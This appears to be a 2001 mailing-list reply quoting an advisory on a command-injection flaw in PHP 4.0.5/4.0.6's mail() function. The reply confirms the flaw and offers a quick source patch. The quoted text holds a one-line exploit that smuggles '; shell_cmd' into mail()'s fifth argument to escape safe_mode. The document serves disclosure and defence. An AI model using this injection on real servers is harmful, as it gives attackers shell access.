At 18/07/2001 02:53, Laurent Sintes wrote:
>php mail() function does not do check for escape shell commandes,
>even if php is running in safe_mode.
>
>So it's may be possible to bypass the safe_mode restriction and gain
>shell access.
>
>Affected:
>php4.0.6
>php4.0.5
>
>Significatives lines of ext/standard/mail.c:
>
> >extra_cmd = (*argv[4])->value.str.val;
> >strcat (sendmail_cmd, extra_cmd);
> >sendmail = popen(sendmail_cmd, "w");
>
>Exploit:
>mail("[EMAIL PROTECTED]",
> "test",
> "test",
> "test",
> "; shell_cmd");
I confirm, this works ...
A very trivial patch if like me you cannot disable the mail() function is to:
Add this line: extra_cmd=NULL;
in file ext/standard/mail.c, (line #152, juste before if (extra_cmd !=
NULL) { ) :
and recompile php.
This will force the parameter extra_cmd to NULL and thus disabling the bug.
This is a fast and trivial patch, the right way is to unescape all
characters in extra_cmd.
Salim
***************************************************
Gasmi Salim - SdV Plurimedia <http://www.sdv.fr>
Directeur technique / C.T.O
PGP Key available at: http://www.gasmi.net/pgp.txt
***************************************************
